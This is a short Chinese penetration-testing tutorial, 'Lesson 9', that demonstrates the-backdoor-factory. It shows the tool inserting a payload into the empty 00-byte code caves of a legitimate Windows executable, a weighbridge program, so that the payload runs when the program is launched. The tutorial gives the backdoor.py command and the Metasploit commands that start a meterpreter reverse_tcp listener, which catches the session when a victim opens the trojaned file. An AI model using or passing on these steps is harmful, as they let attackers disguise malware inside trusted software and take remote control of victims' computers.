工具介绍 the-backdoor-factory

    可执行二进制文件中有大量的 00,这些 00 是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp 到代码段,来触发 payload。

    以项目中的过磅系统为例:

    1. //检测是否支持后门植入

    第九课:工具介绍-the-backdoor-factory - 图1

    1. root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150
    2. //测试裂缝空间size150

    1. //插入payload,并生成文件。

    第九课:工具介绍-the-backdoor-factory - 图2

    1. //对比原文件与生成文件MD5

    1. msf > use exploit/multi/handler
    2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    3. payload => windows/meterpreter/reverse_tcp
    4. msf exploit(handler) > set lport 8080
    5. lport => 8080
    6. msf exploit(handler) > exploit -j
    7. //开启本地监听

    第九课:工具介绍-the-backdoor-factory - 图3

    //打开软件

    1. meterpreter > getuid

    //确定目标

    —By Micropoor